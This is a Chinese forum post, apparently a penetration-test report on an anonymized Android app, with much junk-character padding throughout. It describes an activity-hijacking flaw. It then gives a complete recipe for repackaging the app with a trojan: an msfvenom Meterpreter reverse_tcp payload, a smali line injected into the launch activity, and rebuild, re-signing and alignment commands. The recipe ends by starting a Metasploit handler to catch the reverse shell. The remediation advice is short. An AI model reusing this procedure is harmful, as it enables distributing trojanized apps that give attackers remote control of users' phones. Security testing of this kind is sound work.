1 p% t8 }9 Z0 Q* T2 z: L0 q: `$ o/ D

5 X% e; P3 k6 ~' @ * i+ V% |& ^, d0 ?( N* N   " L$ h$ d: `( a4 j" Z s) f; k% c7 O3 z2 V6 _0 k7 D, M

% ~% Q. t8 z# H, r; h ~7 S* r T' X; j' W( z9 u

! T1 {+ u4 l. m) s$ x" W! ^3 L9 |4 j4 c' j! S8 W& b 1-2 测试结果 9 [' R- f6 M( u. B' |+ M 4 m8 R2 P- t+ n

5 J" R" |* Y8 D' R' M9 v& j; t0 x0 w7 d

* o& T7 r* H+ _; h) X2 p. J8 B! |; j! h: q   ' U( U; ?0 Q* _3 j3 i2 t+ g9 V& {; c4 }# e" x" Q/ V

. \$ Y% S) s7 r * N: W$ c: s, T7 J% `

" x& j+ p8 @7 E6 c7 w3 Y" Q& B9 A8 m4 a, \ 2 检测结果                    " k( E& j1 w! L3 C0 k + J. e5 d; m) g" ~$ U+ d

" K3 l3 z" o' T+ W8 O( D5 S( o' U: p* e! G" E

& r* u: C- L& a) l: {. N- u6 W 2.1 某某某 ! P7 t7 X' V1 ]0 Y- E1 Z2 ? 1 {$ [( N/ u! S8 |6 A5 _

) l+ c- U5 F4 c Q & M. {0 O, o4 k" l. q# d; {& B

D" J, C1 s" |# m4 c & q1 l. v1 e/ w. S1 ~ 2.1.1检测目标 * Z6 l% j* J+ V2 k) c3 R: l3 n# W" Q! f- U$ u8 c6 T; v/ o

) F" d9 y" @0 X% |2 i9 |9 o- R5 V9 D( G6 j

+ b }$ P; c$ B) E6 J( D% t+ I5 u 9 t% P, B" f* v8 U+ J7 e 目标地址: 某某某某某某APP . j$ z* k% u' b6 M" ~- J , Q3 R+ X# K& T' u: `

8 }. ?$ i7 a; O' Z9 z) p- t, m. ~6 q9 h9 |' p# g" a- ?+ |+ C

* N! k, V; Z2 y) D" I9 a 2 r+ s i& K* G0 \3 t* y- n7 P4 [ 2.1.2检测结果 5 J! b" | Z( c: {+ Q 5 Y" ^* F$ H- x! T, ^! w7 l. |

& r. d! I; z0 r9 [) g& J$ \ 5 G t: P# Q8 \4 B

: g0 W4 k/ J. \: F- [6 ]4 R5 i9 B! Z. }5 S) m) k 2.1.2.1 & F, T) f, d. Z+ D! J1 t 9 a+ f: c. v' F4 E$ F6 [7 H0 h* b0 ~ W

; t, R! W( D- e2 X2 @. k' |: O) n/ w$ u

; T4 }! i% _# [1 u/ A ) Y5 T0 c, w$ c7 C" Z7 K 漏洞链接地址:某某某某某某APP ) h( }6 O* C( \2 F0 k! f* a( c % v' |2 N2 P+ l2 W: L8 O! f. t- g

7 L* s f$ S9 r3 l9 x5 H + _( j6 d; h/ j/ y. U) _6 k( C

0 X+ y6 l7 g+ v8 g. V8 W% L) E# V 3 M$ e* Q1 P8 T2 [7 {8 _- ~   8 f2 X% [% M6 j; y 9 ~# ? t& L; E! [

& ~& t/ m3 o; y d! e* G ( r9 @ l9 |. y5 S) e' R

7 _+ ?1 i( F! j1 J1 h5 L h2 ~ & Q! i& m; u9 V( ]3 q 漏洞分析及取证: 7 Y' F. O0 h5 W. q7 o4 n+ ~! T: ? H7 j

/ z7 k: a' l4 J- Z7 @ + m$ t( E5 P( w5 S1 n2 k- h

4 G2 P9 @1 I! ^ % q- R& w c; ~& e; `* c& K7 }                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: - K$ ^$ X3 Z9 m+ v+ C : s8 O2 U+ d/ c% f8 o. X" L

4 K6 |. C6 f9 `, G& p 4 @. S- q0 K6 L r

* i: h/ \: m$ N# E8 z5 R * }& W0 D' u) s/ R& T+ e9 O. B      , E9 Z: x1 h: y7 a; i) [3 X6 ] " y& k8 @- k5 j% D, C, T- @

/ @( X$ ]4 k- K9 H: [ , q; t4 T0 m( E; z! k) R" N2 t

, n- w4 F" E: d; ~$ W8 n+ Z/ I; s! U' x+ ?5 ]                       0 f% a0 H4 E" T4 g9 ?, i) ^& O / P0 Z1 `( X3 h* A

3 o+ Y0 H- P2 f* N8 Z3 H* f7 E# w- H, y5 g2 F$ }: ]

6 N( v* T0 T' h5 ^8 Y+ B; T# d7 D, |+ P; b+ ^ 5 a# V9 A( m1 v4 i+ X _' `+ f' u: Z & | P4 V$ j$ Q# u

8 \) R9 ?5 [+ r4 G* @; i + I" T7 O0 T) S9 C% d3 w- |

) ]1 `! d: P( G- E0 C 5 F& a" T2 ^" H7 @! K6 |7 y $ w1 B0 _8 ?4 S " e! ^: p1 \+ t+ B9 ]( M

, A9 k- _ x1 N( N/ e) t# `$ k/ y / I* W3 f y. j" d' u

1 {4 H, \$ J) [. w2 q ) H. z% @5 g) u& N6 [- U, U+ g3 u , l0 y' @1 j+ W$ p6 }( B( _' g 9 |* \" l k7 U- { ]

T9 j$ @) ^ s/ t % D! e6 z6 o* j# ^0 [

8 P1 w: y" r5 X: r6 J 4 s/ X8 c& j% r+ d+ M( r9 F2 } 漏洞危害:高 ! r& n0 i: Y: p) U' ^: l1 I' \ 9 k* W; k9 T0 M6 h9 p- A$ g" q+ j

. r' v: N" c. I7 @7 I9 u $ m" e* T+ n9 Y0 n- O* X
/ E& \$ `- A% \1 t 7 J8 a! M7 l* t1 ]; S ) p; h4 d. N0 F5 k8 t3 j- o* h3 r% _, i T. a: e9 h2 g4 q6 l4 ?. ^- U N* ~: Q1 \/ J. {% u: _" i! K% \, \1 ?& r9 B4 g" b8 @1 Q1 \$ o; h( O; Q! K, y! d3 }: n* R- R; |' U, K* W1 ^, t, Y( e. A4 d: T! d6 l* W ~5 C( S" J" O' N9 C k; S! j) @) p( X: P3 P1 Y7 x: x* |! }! {0 Q& E! c1 U6 l% _$ h, k! E- \' m- U/ j9 H' w! P0 N% r* R1 M$ A2 _6 c) ~( j; x% j- ]- B! C& F4 t1 P/ K j6 V6 ? I. W# b. Q# V7 g/ C8 v' O1 S! d! W2 D9 K3 S+ l! `" [( X, c0 p2 J9 k1 }3 P5 P7 A5 T& a" U: i+ v% Z$ ~! F0 V/ K5 I2 Y- T% v% g- c: l% H- x4 t. j/ E, x+ s0 e5 ?: o- T9 P; Q) g" N( o; g2 \1 F1 \' x6 Y. r. |' z- M( D
$ P6 L3 j1 ^! I2 U4 r5 a/ l , x8 r& @( y4 t

. k3 f2 f0 y( j" l& Z' m9 C1 ~/ [8 W4 I2 w 严重程度 7 k) a2 ~9 K$ y9 ?3 t. h) O* @" _6 F

) M2 ^8 E" w6 ^* A2 A0 x9 q , {0 l! [4 K5 b% c1 r0 }, P 		7 H9 ^7 `" C0 t" J% u2 }+ ~" Q! e$ ]- K" g5 n

+ n7 r* h- d# T/ T9 S" E; r; u2 V/ t) \% s & q6 X! A4 r6 D* ]9 M * l& W ^5 a+ Z9 N

8 [% z; {- D' G1 ~ p% w# | 4 F4 f& G# ?" o: D! ^4 f& f 		; D+ U' B3 X9 H" e2 @/ Q* G- u+ p" K7 l1 c

1 o' u. {9 y% B/ y: r: r" F* b% d0 M. x( ^2 I8 {+ ~ - p1 n( J2 ]& y3 e l* O" b ; b4 n! m! w( u9 Z1 L' _( S, F

/ A0 @; p/ W/ E! G/ t0 t6 H( y$ X1 T9 G. D7 {8 e: J 		; ~( \. ^/ s# R& E4 j& C4 n+ F3 P) y' z

/ O, F- t+ D! k1 B % X+ c7 J2 l) }1 _ 5 @% d. K' Y. S7 g! p6 y $ N& F" | C ^$ g- P

- x6 H8 C4 h6 }' [# f E5 ?4 a% ]9 O& w" r4 ^1 O 		% u. L7 J$ D: t2 ^0 h8 K1 P 7 g+ E0 L3 b9 s s3 x$ ~

8 A) d; r# u) E; W3 d8 z 5 W0 _) f6 X& c+ N, E   9 L% U8 x4 P6 X + O8 ~0 n* C" ?1 |" Z- b7 O l

; I7 |2 q6 A5 f7 e. a' V) X5 r/ @2 R4 o: ~2 j' i9 J6 { 		& H9 k3 A/ \- `! y3 d 2 T8 {9 {/ j$ u) c" x+ i/ O

, r6 F. G6 y; H6 u4 v - p* r, V/ u, K3 D. D" p: n( ^ y ) h: V- v! ~$ l4 ?. Q: R * {; F6 _, G- b

4 g7 ~+ h: s5 E% |$ i: t5 |: q! m9 {2 O$ T5 ^: P1 L* I, r% g 		. I2 i8 @: i, c# \- \" p " I1 S$ m5 g4 ?; ^. ~- a- Q

2 j; J# M" i# v, l ^! c8 W `6 F2 G$ s   / s* @) _- c/ \1 \* Y 3 Y' b- ?. o- ]" p8 b* P

# x, Z* w% c: c( Y5 } r) \ $ v" j/ [- L E5 v. Z. G7 k
1 m7 Q. k1 ?+ B! ~$ b% D/ t / [- v/ r$ T! ?( f! `1 O/ E
; W6 H' |; t/ o, f2 H( q8 x4 m9 d8 X; P. F: ]+ U/ W( s

' `! z& c% T" G. b" q) |+ L: N T, k   : S: O7 R, ]3 E$ k9 w, x9 ?$ G' Y0 ^: Z' H* q o% ^9 a/ S6 C3 `

: A: ?# g6 a" e" d6 l+ A5 S , W% [+ Q+ a, `& N- c

; O# ~0 y- u1 M; l+ M 9 A z, k! A- s6 }) e3 M 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 4 E1 ^4 F8 e, g& f. D4 d& H 1 a6 x$ q5 k6 G3 I. j# @; G" V. r5 _

, J; A5 @+ Q& r& ^' D, `3 x3 f' X3 a, U& V" ?7 u: t) O

: g6 W$ a3 l/ q2 q; p" q7 E* K8 v9 U2 U 4 c; {/ z( L% v8 x# \) z           " P# p: q* V6 O . r Z0 W1 z1 G- O. C% U; W0 J' h. Q) Y

$ i' u$ ~. _2 O 4 m4 C/ I1 e" j6 P3 b6 O7 b

2 ~" e/ ?. _& j' J # q- P1 |: f8 `# K   # ]3 }$ a) ?( E5 o1 u3 l% i. e . f) H3 j* }6 J8 T" A: a' T

0 J$ g0 t+ c0 g5 }( E6 C% c$ k + p: @* q+ W x7 h( w6 V

3 ]6 y4 x+ ]5 v4 S4 d6 o$ q% E6 Z5 K; ^. G/ b0 j3 i1 r) g3 T 2.1.2.2 , T3 V/ a x% p; ? . k% D" ~: ^" B

* l" u; n: ?; }2 V2 k9 z- X ! R' @2 p; _; }

6 w" [/ g3 Q- K0 e. q- I5 e4 I( U 4 Q& n7 t- _+ o8 X# I. I 漏洞链接地址:某某某某某某APP 1 l' m( i+ M! M: t8 c- K " I- q: ^. F' L- m9 ?- F( K+ [( s( F

6 w" h7 Y% q( ]6 U; b, i; ]" Y1 g/ M+ O' k! k' u5 U* A

( ]1 w1 f+ @5 B3 M7 C. X+ B9 o4 w; K. z 漏洞分析及取证: ) v/ G8 r3 ^. C5 j6 {+ {0 g/ H- n3 L( `$ ]* y9 C, d1 g

+ ]( V/ g2 g w) a0 U 0 ?6 E) V. |; G$ q# P0 J+ n

" a/ d5 Q2 A( T / x4 w$ u: S. U/ I                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 3 P- W2 d {, h * q$ z& u1 F$ X% A

2 G, [/ Q- x) T # r* [7 F/ |2 o- D9 J+ U

- `4 d( l& M& [- d- w : V* v% g* J% U1 q' p Metasploit 生成木马 apk a' x9 ?$ M) i% p$ F 4 n7 J5 B6 t/ g8 @

( Q4 Q% v0 U& X% o6 ~3 h ! }! \$ v9 q8 N" i

# N2 Y0 p; r* s. P3 @ . K* `5 A0 l7 B8 ~8 N9 w* { msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 9 R& O* _9 |6 a1 u" g. g7 n 1 b. c. E5 U/ j) f/ I4 p# K; H

% K0 O1 Y( {8 \% o8 w & c& d$ _. a6 D, a! O

' N; C5 W/ @, X( r6 C / z3 w+ o& n! d 反编译目标apk和木马apk ) | R3 ]# D2 Y! R2 j" U; {0 j0 V' z; c ~; o4 t

7 t, x/ D' K6 h7 M' M% B) v, t7 C, _) q" Q

7 n! _1 K! f2 T; t! x4 C$ G / z4 |- {8 K! q1 P apktool d target.apk
9 E# i- |' m# _3 g9 A/ M3 D9 Q$ i1 e" Y: h" z9 z apktool d cockhorse.apk 0 e2 N3 p0 q+ V7 _4 W+ X 0 ~( o* T3 d3 b; @! z D# q1 H

0 L+ x1 B3 o- `' E4 t5 B o ! F/ @2 u: N6 A; G' h

# T$ t8 |6 `6 |! w- _8 G4 r ) M$ k3 T* W' S 木马 apk 注入目标 apk 1 K3 Y- x8 |5 S8 A' v& \2 R7 J" v" W8 N& R. X$ B6 T3 D- r

' J4 Y5 R9 T, Q6 w ! J( q6 K+ S- K% l) D" Q6 K- M

' l b! M1 v/ @ # d7 C$ w+ n5 i& K, r5 x 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
0 z) g& D* f- Y( } U8 r4 F ( K {& u' L, O2 e" v8 m+ x invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ) c) ? x! l1 X; m; y* H* x 3 l9 ]1 p& I8 l i) R' h4 X

" o7 M; {, L* f- d- @/ i9 p ! W4 T% u. w. e8 {7 z) Z

2 g! w3 ]1 q' V( k 8 N+ `# W/ F; \0 Y 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 . c5 ~8 ^- B8 T1 w - u) s6 m9 W$ d' ^- S% _

: Q+ w! e7 K3 R1 v4 K2 V 3 T# P( j7 e. n* D" R

9 x& o) Y2 i* W h: Y+ j2 Q" | % v- E d7 b( t9 M: F 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ - V6 w3 b6 b# l " M) C& N% w( F0 H

9 p# [( l k# v/ a, Q. C, H: G . z$ E" U6 {3 }. e

, R9 n7 O7 n* o8 Q + E' ~6 V9 O6 U; W 回编译生成最终 apk 9 O$ y0 E( Q7 X 0 v+ z2 x2 N; ~& K9 D! a

! @! G* j! r8 d9 U& n- V ) k8 O' y% E' f4 `: {

: s+ S( m" R' t7 F" v9 X5 g$ M6 D- o 重新打包 9 G4 ~; A/ H1 r$ F ! k* J% q9 j& N4 p

5 L0 \5 _' G, l5 m, P. R, V& d% F " _3 X, u' p. Q: s# z- ^

5 c2 z' \" a, j) v" j * Y# }$ R4 S( w% f apktool b -o repackage.apk target_app_floder 4 K: ~/ n1 P+ P5 r+ O9 V, d 4 V% ]5 W' ^0 \* {" f' | e$ b ?/ d1 ~

! D; m# i: h5 [% g% m 0 |) ?2 \0 Z+ j% e9 a

3 d% @2 A% V, {. I8 I: x! o. ^% p% G, v$ ^" |* m4 ] 创建签名文件,有的话可忽略此步骤 ; \" D& Z2 g" J+ V- W+ b4 u8 {' U$ Q+ k8 N5 H

0 L8 ]6 k2 `+ `; G! N" {- s/ B 8 M t- h# j% o) h' ~. P

% O l: d' H% X, _. L U3 S1 U; l+ R0 J keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ' U- A, ^6 `* c/ O8 Z9 M1 ? , _3 f. i$ {! B9 x

# C1 y2 s) i' [9 V3 {7 Y4 H1 a+ M4 w- N

8 Q# Z/ J1 g1 P. a% _ 4 F( E# }5 Q+ p% L$ U( H 签名,以下任选其一 / Q2 M2 F: y! Z8 q9 w4 ~ * k. V! r$ `8 y1 R. e( b# l

" X/ X4 v* M3 z! x: U - |0 [" u: |4 F' [3 p' e

. b3 z* m9 W3 ]$ @. s9 r " o# w' o w6 Z# k, g, J J jarsigner 方式 0 A ]) }# a' r; d/ s; B# t & Z3 _% M2 g/ J3 m6 E" E, T; z

* R# R& X* A ^/ q 8 _5 J: s1 {/ q l. ?: D9 c, i

* }; u1 \: ^. P8 v# q, z4 x/ T z! {- u: P3 c jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname % z8 a1 \: P% P, K+ P" m $ @: b A4 K7 Y9 x. N. I- D

6 h0 v! T6 N# W% q) L s$ ?5 |$ z9 o

4 ?# n4 q$ M2 l $ ]! M1 @, y, M$ x W4 ~ apksigner 方式 G5 @9 T- c# }5 v8 [- |, m* ^

' k3 @ v) W! @5 m+ ]) e4 g: j9 \8 O( u9 z% b1 e m* ]; ?" U

8 T" C3 R: ]- w i0 |2 Z & e! q3 v Y. k$ Q- i apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - D) ?/ \/ G6 B& s" S8 D4 |9 j7 C8 \& o

8 i1 y& ?( w7 o- z2 f ( c6 U) T0 \8 u. b- ^" H) d" y' J

3 M$ [" T3 m+ G' k) M 8 {+ y8 G: g) l& G0 M- o$ N( S 如需要禁用 v2签名 添加选项--v2-signing-enabled false $ ^7 {' J$ L- r5 S% ? ! a; m, Z' {4 w& j

; C1 t" a$ d& H5 T' h * g3 K* E" ?8 ?9 C# T

5 T& B% J0 {' ?- E2 c$ C " d5 `1 ]* m) W3 _5 w' F! ] 验证,以下任选其一 8 ?$ r+ b! j) c, e3 d4 j' C9 K* g7 Y7 a8 F

& W1 Q' K- j/ n* a9 Z& N$ u, U+ F2 l" c+ c

0 `9 T# S" ?1 f+ u0 |( x 9 j# Z$ Z! u( i/ o jarsigner方式 " v! H% l/ ^: M% [& R: W8 k/ N ; @4 m, A* i# l1 v

; i5 o4 D3 r7 I* m! g ! _- N- Y( o6 y* r5 C+ |* Y( H

" M( l- Q; L. w! R$ [; M ' f- D% _3 |6 u+ y6 k/ J jarsigner -verify repackaged.apk 3 j2 p% e+ [# W 8 T/ h$ B# g9 V4 a; V' S( U7 \

$ Y/ d6 x8 @+ |+ u( D( U+ J 6 k# `* L4 u' p9 O

; E& `' ~; [3 S. W" Z/ W/ j/ I; T0 Y: r: w H apksigner 方式 ; {5 m2 w9 O/ s# |2 i6 @# p1 P. M8 F1 @7 K6 ?

+ R9 _1 R+ G: ^# ~: q. } x: r* j3 D5 V5 x0 m3 X

* E8 R h7 M/ u- h6 F9 N) H V1 o8 ^1 h r apksigner verify -v --print-certs repackaged.apk 8 n2 r$ S ?7 `* w+ g! e5 T" t+ [$ e* e

+ M5 {3 w. V, J- q2 D " b. q5 Z }- C. v1 p8 A

4 |- ~) n/ G& M6 K3 T1 P * ]" I! ?8 @8 {7 r% C% R8 N, W keytool方式 7 V% G% J! ^4 ?3 D5 i2 w . w5 X6 @6 K* j8 h% E! d4 z

% C: D9 ]: d" p$ k' w9 J7 G) b) @& t' G9 f( T+ I

. V% ], H. U+ R: d" m- E9 ^7 L 2 G- B( q* z* j4 [ keytool -printcert -jarfile repackaged.apk 8 E/ I- _- O% T4 j: M . v% ~( p# u7 \# {

* l, s7 ~- L( C3 U 5 G7 T. a# x) o- Y1 {' K

4 o9 G/ M, y; V% t. [( `4 K1 l 6 f) H! X: \! H# Y- p" \) q( E 对齐 4 ^8 \2 Z! R7 n4 Y 4 D5 z+ l4 n7 D/ ^6 H( L

7 e: A Y& N6 a" Z; N2 _4 L$ _" T 0 i. T. q- e f' ~

n3 s# y3 n: a/ y + m8 }" {4 @1 m3 U8 i! } 字节对齐优化 4 Z& o/ x0 o9 A! O( E; _ 8 R# s8 }3 t* u

. Q( p% H/ p( Z' N7 \ e- \0 z! z" B5 S5 B8 W

6 U o( J1 S: F0 o# j6 a5 \ # s9 Z( U# [, n% q: l" k* U; ] n zipalign -v 4 repackaged.apk final.apk # Q5 M2 Z- v0 ~0 M & i* H% d7 x6 A; ?0 @0 {

6 z9 H6 s. w! t$ l7 A( J7 Z5 x& D0 O+ C- ] w

: Z, Y8 q5 o" G8 S 6 `7 |9 \8 K, u# ]2 _ 检查是否对齐 1 L# e3 P9 Y$ H9 z$ I" o $ E! v5 B% M+ N& Z" K

" ?, V) ^: X) F* J; e( S+ d4 v: V9 ~4 B4 s) |- i, d0 y

# m! z, F6 J% g, J4 @+ l 9 |% t4 m! M8 | zipalign -c -v 4 final.apk $ m1 P1 a D8 x. t4 [5 N: V , g6 V8 p/ M* p7 T1 s

7 [$ s; \8 ]0 `% j; c/ I ' `) `( j. M+ \

1 A7 K4 i- p& D: B 7 k0 }: q5 y$ o) s1 T5 d# P# _ 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ! v2 K; U- Y* k; o7 C; N' }% \/ u6 M9 l0 `1 L- l7 K2 R1 E

8 Q3 i2 P0 S, t+ u1 y# j e3 z' _# w: i N

& k4 a) D. j o9 f- q( O/ H" ` E# t1 U" Q# [7 U p: O }$ f' M0 f 启动Metasploit控制台,配置参数等待上线 & H! Z, ^4 o' J) I- ]0 O8 | ( k+ Z* _3 x( t9 Y! T$ V# r

. E9 }. v- {& m3 e$ m+ [1 D % ]9 X5 p5 k5 o- \1 @3 ~

/ Q# i9 \# Z; _% W1 X* g" j$ f+ X% S 在终端依次输入如下命令 . R9 d( k5 ~! Z0 f O' S/ k' E' g5 m) H) C

, j% L, M4 n. _; `' o- b3 J0 J$ J 5 x) H& B: c- m' F1 _4 W* Q

( L6 [8 ~' J, \9 k A3 ^" J" B ) x6 e; i' |: F: ^5 A Y msfconsole * @" t( t# ]$ e% n9 c" U1 a * z8 v d! Q- `* e9 ?, h+ [- L

" x& r# u' @+ P, X* a! j4 s& P % ]4 M$ C) C7 K& g; W+ q

5 t. U" |1 w; ?, h& e5 _/ I' {+ _, d6 t/ R. `% o use exploit/multi/handler & [# b6 y/ x# {! s" L& m7 L6 T% O: Y

7 t" g9 u# w8 c5 W% d- @, |8 l8 O I7 Q- V8 M$ d- m

6 p$ o: m- m& r9 q 0 m1 D9 r9 A7 z2 h( q set PAYLOAD android/meterpreter/reverse_tcp + i( Y" {/ J8 L8 o / e* ^, H, I, j/ D H0 O8 N, U

7 L+ Z3 q4 p, o) M: n 8 T$ K, w+ l3 Y0 a+ _9 D

. |2 V9 F& O- Y- \; j0 q. [ / i6 @! l- M+ { ^" a, b set LHOST 192.xxx.xx.xx * @6 S6 n3 |% U& S# U - c' f* x3 ?- V0 m+ r

1 m k$ G5 `6 Y( _# B% e, g ) N+ ^% i1 ?- J6 j! W& z: T+ a! v

/ r( ~6 I/ H, m! I! y4 Z' M$ c+ z# e `, j4 \ Q set LPORT 4444 + C+ ?4 I/ k5 k0 w7 N 0 `8 E; y$ G D& I+ T

3 H2 {1 i+ x, J' H+ w) l, C; G8 u& t& Q, t0 w2 P

$ ~6 ^" f4 U- y: s1 R) H# V 7 t$ M6 W3 F7 Z6 w! v1 |9 F exploit & c+ Q+ Z8 ^ |$ p # `" ~+ T" r9 H

/ v+ w/ o. r0 X, p; b" K& r. | . a/ k7 Z8 n8 P2 U3 E5 c3 l

: f4 r+ g, d+ m% h6 o6 N0 l* ]8 P a3 A6 B6 r) q3 r 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               9 [- \6 F' x1 ~% n + K8 L6 w" ~( O3 j$ F, l) f

8 O; K7 m4 }- J6 ]6 u' l $ Z$ i$ b( y. Z2 j* G9 p4 s

$ ^9 W d8 F+ t # n/ q' t( Q7 C! G7 m 漏洞危害:中 * G/ H6 F( H0 @$ n . X" N, j7 w5 ?( X: G5 [

& q" ~# \, n0 P5 _! a 2 j, u! u; C5 v* B1 C/ ?9 Z/ ?
; ]/ k5 C8 `* r8 P) F7 C . V% C) N2 Q5 D6 F$ _; ~ 6 L/ U3 x' E: E* p' C$ [ - k" w# I3 ?6 `) n( F7 ^: y1 X ; h/ Q s1 @2 I$ Y- t0 s8 N% m, a4 |. D% Z, N+ i# |$ u1 C0 z1 s g' i& w% W' L& @5 a! D3 _: g5 q; p5 o; F# J: J l* ]6 s$ s: V1 {; W7 {, |8 T7 x: @! X# [3 K. I R: G2 t9 m" M' Y2 e# }; [" ^) I9 @3 r9 `0 r5 v) M- t* P# G; n* }8 S" q. `+ ~- Z7 }* g4 e+ q# y! b; ]' |5 A+ |% s7 c5 Y1 d' O% q8 E P% ]4 r/ y! C3 O, l, I( P" }, g# d* d$ z6 D7 X N' n* Z) B5 Q# W1 {) b8 p R: T" z! r2 w) g) H! q' n0 Q( P/ m) @* d/ Y0 q# s' s- Z$ [. u" c$ P* S0 G' ]' k3 I9 U# D, x$ ?' Z& c$ q- O. A7 M3 A5 I% {# e w3 {1 H, p4 P/ T1 e% a: z% N$ g# }- M) i" s7 H; _& R% N. i4 r+ [9 M1 Y* {8 ?0 @
% w3 C% u/ i4 q ~ % a3 V. u; Q1 K( c' Z2 g U- Y/ Y

/ |& O$ q9 C& [& A! d 6 |; r/ [, L( o/ S 严重程度 0 i* G7 t. T* U1 d, S. W5 U- `. g6 k6 d$ R/ U! t

; Z4 B) T/ k, K2 M& \) t) u! w D4 P5 B7 i3 g7 v- a# y 		, T8 `. M3 s8 |8 G1 Q u$ @/ u* g * E" q3 [/ Z! [0 l

3 N R/ v: d" {. | * L: ] f( A# C7 e; y : Q% ^' r" @5 |' e ( a- U- n8 P; e0 T" m3 ]6 ?# n

3 T7 {" l* v7 i' G+ n W 2 T3 o& R3 k4 V 		, |) A% B4 `/ u- [9 `7 Y 7 c( H- q2 m/ |( G9 n: c/ U

8 i3 q! P4 Q: e6 \ C* @8 v" [6 } 9 m7 i& }% {6 n- o 2 I6 r: u9 ]" l$ m z4 B; ~ [# P; S$ l

4 g, R3 ]/ x; r1 U( p8 { * E9 h8 W) x- z2 R6 T' U 		/ L7 N0 o8 i5 n $ A( q" u0 ~- F4 z2 ?

! r+ O% p6 P" X4 l: e, v( s$ @# T3 h3 @; v6 ~3 N. `# j6 k+ Z! s 8 Q. v& H3 V8 M' q. A. z+ S7 }% [, ~ ( T3 w3 {$ r, c4 q% o/ q

: u8 ?. \/ [$ b / e4 D* ], [, I; o 		& N: `3 u2 m5 q; N2 W; J0 E7 h# U 6 S1 s9 w5 p4 M/ c. H 4 p9 ]) a0 f! T; @" z# B& X/ e0 J* P; R$ b( ~! U

; `& a& _% x+ d6 O + n3 o& w# B7 G; f. k% r8 K* F   $ g3 [" O- o8 a2 Q3 h4 S 6 w+ s9 _8 U) n( t

4 }0 o7 t" s T7 B/ k 9 p) Z+ X5 t- C5 A% k 		$ Q8 t, u: d( |* `: L. Y8 D9 ^$ D# C; o1 E# V4 H

' v$ G: `2 ^3 w" X7 ~& N9 V" G: A8 q B/ i8 i - m% u) y! |7 } " s. C _8 P! j% u# U: v

0 Y2 `# O# L$ E; H: I5 a$ v1 ?/ @ T5 R# Q 		/ W6 [, y0 J \. ^2 { ' [( x; [/ m1 N/ ?# v* X. H % X. {( h) O# a8 X) }7 m3 s: g( n% q$ ~5 L% W, f

( g4 Y+ |" c3 f5 @% N W; }; _) H6 E! K/ z b2 r2 _$ o   3 {9 E/ D5 }8 D+ N , h: w/ P( g+ x4 `

* M( C3 Z5 P: r( X 9 B* K2 }! T5 g- ~9 G
X2 T8 M& E s" }$ W( B! o! r" f6 ^( Y7 I
1 ]0 L& z2 l# F# L 6 h; e' s; j3 {: ?# d' ^

5 v5 o$ Z6 v( j1 [ F1 r* B0 o; u   4 d7 g! G R7 R9 {' x. G8 i ( |' H- o: Q$ z

- Y/ G5 Z+ R9 \7 h+ l- [. g z& q9 g, I# F. o$ ?* k2 k

( @% L, m Y0 l: e. D % q4 \* y o$ Q' V1 y9 b6 c 修复方法: " T, i2 |" X& n1 W2 C% @ Y* p! Y$ \3 v& X

5 X8 @, }( |2 l+ O1 r% J) b* F/ G , V ]; b- d& E5 U2 ~" g

- u* g1 O$ M6 B& i3 p + X& ~- q) L: i5 s0 |. S               1. APP 启动时应做签名校验防止二次打包。
: B8 A+ S+ |9 D6 a: v( c8 J+ j$ Q # q/ A6 ?1 i# I, G5 V& L7 ?0 q 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 3 n" Q [! o# {# x; v; K" b3 a' B9 S k4 Q( s2 Z

* A/ ?! A! d3 Y 3 S. A- R2 t8 B9 c o # P+ p' P6 L3 K: |% G - e1 Q `2 [9 Y# ~* i( O* Q0 f

) d9 d$ `; X+ A 8 T8 r) a3 ?, ~, _$ _# j/ r+ q& p   4 Y5 b% U% }# Z; F" K. z' ^; R* s( ]7 y8 X3 n4 v& i: G

& J$ v$ ~: H. J4 P3 ~+ H) C5 S5 {# `, { G4 C! K " A( \, E0 u8 _$ e; }5 I9 h x 3 q x' j- z! I

7 Y; C, l& X, k% K) z U- o7 v* i9 o r* p7 Y8 k, ]
4 i5 i7 V6 ]5 J9 Y1 q, [1 q3 L% M# @$ k! u5 ~9 j/ V

% a( o. ]7 _7 S6 A7 J # p+ W K9 e6 \$ B, x8 g0 P; \
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表